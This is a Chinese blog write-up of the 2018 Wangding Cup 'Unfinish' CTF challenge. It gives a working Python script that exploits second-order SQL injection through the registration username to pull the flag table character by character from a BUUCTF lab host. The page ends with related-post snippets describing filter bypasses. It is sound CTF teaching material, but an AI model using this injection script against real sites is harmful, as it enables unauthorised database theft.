[网鼎杯2018]Unfinish

最新推荐文章于 2025-08-09 00:50:46 发布
原创 最新推荐文章于 2025-08-09 00:50:46 发布 · 226 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

该博客内容涉及了对一个网站可能存在SQL注入漏洞的测试。作者通过注册和登录过程,利用二次注入技术尝试获取敏感信息。他们使用Python的requests和BeautifulSoup库来构造和解析HTTP请求,发现并尝试绕过过滤机制,最终成功获取到部分字符信息。

在这里插入图片描述
先随便注册个号进来,找了一圈没什么特别的,注意到可能也就用户名那里可以二次注入,登录时被读出来
在这里插入图片描述
测试一下
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
可以看见,确实是做了一个判断,二次注入

可以fuzz一下,有一些过滤
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
102 就是 f ,那没错了

import requests
from bs4 import BeautifulSoup
import time

url = 'http://85ee117f-5e9c-40d1-9280-ac80cdc5079c.node4.buuoj.cn:81/'
result = ''

for i in range(100):
    i += 1
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
    register = {'email':'123{}@12345.com'.format(i),'username':payload,'password':'123'}
    login = {'email':'123{}@12345.com'.format(i),'password':'123'}
    req = requests.session()
    r1 = req.post(url+'register.php',data = register)
    r2 = req.post(url+'login.php', data = login)
    r3 = req.post(url+'index.php')
    html = r3.text
    soup = BeautifulSoup(html,'html.parser')
    username = soup.span.string.strip()
    if int(username) == 0:
        break
    result += chr(int(username))
    print(result)
    time.sleep(1)
[]2018Unfinish
丁航航的博客
08-05 797
2018unfinsh
2018 Unfinish.rar
10-28
尽管我们无法详细得知“ 2018 Unfinish”具体包含哪些挑战和学习材料,但可以推断出,这是一个以安全为主题,旨在提高参赛者技术水平的赛事活动。参与者通过这类竞赛,不仅能够在实际操作中检验自己的技术...
[ 2018]unfinish.md
09-05
[ 2018]unfinish.md
[2018]Unfinish解题,五分钟带你解题
m0_69151365的博客
08-05 1941
这道题是一道很经典的二次注入题目,回顾解题过程,我们显示登录页面找不到注入点,然后开始扫描目录寻找其他注入点,找到register注册页面,注册完之后登录发现出现了用户名,那我们就考虑注入点是不是在username,开始注入发现结果是0,所以我们就想着用转ascii码等方式来注入,很明显这种方法是正确的,然后information被过滤,我们就尝试用sys来注入表名,但是并没有成功,可能应为不是MySQL所以没有成功,官方也没有放源码出来,所以我们就猜测表名是flag,然后编写python脚本,最后解出
[2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 945
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
2018 unfinish
feng的博客
10-29 2946
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
-2018-Web-Unfinish
m0_63050933的博客
08-12 971
经过尝试,构造username=select database(),登录后显示用户名还是为select database(),说明后台代码可能把username用单引号引起来了,导致其无法显示。如果万能注入缺少符号,如果加@符又进不去,那我们尝试扫描文件,然后发现有一个register.php的文件,应该是注册页面,我们去打开。getUsername=soup.find_all('span')[0]#获取用户名。我们注册的用户名就是aaa,可以看出它回显出来了,我们尝试从这个地方注入。
Buu - [2018]Unfinish
夜风的博客
05-14 505
但同时,如果是 1’ or ‘1’='1 又能成功注册,这是肯定是单引号闭合,但是因为不能在后面跟注释符,如何进行闭合。解析:注册账号,将信息放在数据库中,登录进来比对数据库,将对应用户名拿出来回显在页面中。注入点在注册页面的用户名处,测试过滤了什么 => 单引号 语句后面跟注释符也被过滤。-> url/register.php => 有回显,可以注册账号。-> 注册完进来之后没有什么信息,能观察的就是左边有自己的用户名。流程:注册账号 -> 登录进来 -> 回显的是用户名。
BUUCTF--[2018]Unfinish
qq_46263951的博客
07-14 936
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
【复习】BUUCTF:[2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1514
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
XCTF:unfinish2018)(SQL二次注入)
羽的博客
09-14 1486
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
[CTF 真题] 2018--Web-Unfinish
weixin_43586169的博客
07-22 1713
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
安全】CTF——[2018]Unfinish-SQL注入-二次注入
最新发布
2301_79915754的博客
08-09 781
摘要:本文记录了[2018]Comment题目的SQL二次注入复现过程。通过注册页面发现用户名存在二次注入漏洞,利用BurpSuite测试过滤规则后,采用十六进制编码绕过限制获取数据库名。在information_schema被过滤的情况下,通过猜测表名flag并使用无列名注入技术,最终成功获取flag值flag{228a223c-98f4-421f-ac54-e603170d9485}。该案例展示了在真实环境中的注入技巧,特别是绕过信息限制的无列名注入方法。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值